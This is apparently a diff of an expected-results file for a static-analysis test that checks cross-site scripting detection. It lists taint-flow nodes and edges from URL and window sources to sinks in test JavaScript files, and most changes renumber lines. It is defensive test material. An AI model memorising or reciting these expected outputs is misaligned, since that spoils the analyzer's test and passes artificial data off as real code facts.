semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | | typeahead.js:20:13:20:45 | target | semmle.label | target | | typeahead.js:20:22:20:45 | documen ... .search | semmle.label | documen ... .search | | typeahead.js:21:12:21:17 | target | semmle.label | target | @@ -811,8 +811,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | provenance | | | optionalSanitizer.js:2:7:2:39 | target | optionalSanitizer.js:6:18:6:23 | target | provenance | | | optionalSanitizer.js:2:7:2:39 | target | optionalSanitizer.js:8:17:8:22 | target | provenance | | @@ -919,8 +919,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | @@ -930,8 +930,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | @@ -949,217 +949,217 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
    ' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... .search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... .search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... .search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
